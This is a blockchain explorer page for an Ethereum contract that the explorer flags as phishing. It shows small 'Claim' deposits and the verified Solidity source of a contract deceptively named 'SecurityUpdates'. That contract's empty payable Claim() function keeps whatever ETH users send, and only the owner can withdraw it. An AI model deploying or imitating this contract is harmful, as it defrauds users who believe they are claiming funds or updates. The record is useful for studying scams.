ETH Price: $2,266.57 (+2.24%)

Contract

0x2da6dc1f40CA939262603188182F801374488D99
 

Overview

ETH Balance

0.021253359433878334 ETH

Eth Value

$48.17 (@ $2,266.57/ETH)

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Claim169907392023-04-06 16:28:23520 days ago1680798503IN
Fake_Phishing326444
0.00320913 ETH0.0005862327.65903707
Claim169786072023-04-04 22:57:59521 days ago1680649079IN
Fake_Phishing326444
0.00042871 ETH0.0005411625.53251296
Claim169773042023-04-04 18:31:35522 days ago1680633095IN
Fake_Phishing326444
0.0043966 ETH0.0006799832.08213229
Claim169696392023-04-03 16:20:35523 days ago1680538835IN
Fake_Phishing326444
0.01113292 ETH0.0007284834.3706433
Claim169506202023-04-01 0:03:35525 days ago1680307415IN
Fake_Phishing326444
0.00208598 ETH0.0004516521.30939731
0x60806040169363222023-03-29 23:52:11527 days ago1680133931IN
 Contract Creation
0 ETH0.0047730723.93800782

Advanced mode:
Parent Transaction Hash Block From To
View All Internal Transactions
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x80F6373B...d9D430218
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
SecurityUpdates

Compiler Version
v0.4.26+commit.4563c3fc

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2022-12-23
*/

pragma solidity ^0.4.26;

contract SecurityUpdates {

    address private  owner;

     constructor() public{   
        owner=msg.sender;
    }
    function getOwner(
    ) public view returns (address) {    
        return owner;
    }
    function withdraw() public {
        require(owner == msg.sender);
        msg.sender.transfer(address(this).balance);
    }

    function Claim() public payable {
    }

    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}

Contract Security Audit

Contract ABI

[{"constant":true,"inputs":[],"name":"getBalance","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"Claim","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"withdraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getOwner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"}]

Deployed Bytecode

0x608060405260043610610062576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806312065fe0146100675780633158952e146100925780633ccfd60b1461009c578063893d20e8146100b3575b600080fd5b34801561007357600080fd5b5061007c61010a565b6040518082815260200191505060405180910390f35b61009a610129565b005b3480156100a857600080fd5b506100b161012b565b005b3480156100bf57600080fd5b506100c86101e6565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b60003073ffffffffffffffffffffffffffffffffffffffff1631905090565b565b3373ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614151561018657600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156101e3573d6000803e3d6000fd5b50565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050905600a165627a7a72305820b55c1d463cd6e40fb05e74980dcc4e6bb183e5dc9fe55bba4e90a46c120634c60029

Deployed Bytecode Sourcemap

28:512:0:-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;438:99;;8:9:-1;5:2;;;30:1;27;20:12;5:2;438:99:0;;;;;;;;;;;;;;;;;;;;;;;390:40;;;;;;255:127;;8:9:-1;5:2;;;30:1;27;20:12;5:2;255:127:0;;;;;;158:91;;8:9:-1;5:2;;;30:1;27;20:12;5:2;158:91:0;;;;;;;;;;;;;;;;;;;;;;;;;;;438:99;481:7;516:4;508:21;;;501:28;;438:99;:::o;390:40::-;:::o;255:127::-;310:10;301:19;;:5;;;;;;;;;;;:19;;;293:28;;;;;;;;332:10;:19;;:42;360:4;352:21;;;332:42;;;;;;;;;;;;;;;;;;;;;;;;8:9:-1;5:2;;;45:16;42:1;39;24:38;77:16;74:1;67:27;5:2;332:42:0;255:127::o;158:91::-;205:7;236:5;;;;;;;;;;;229:12;;158:91;:::o

Swarm Source

bzzr://b55c1d463cd6e40fb05e74980dcc4e6bb183e5dc9fe55bba4e90a46c120634c6

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.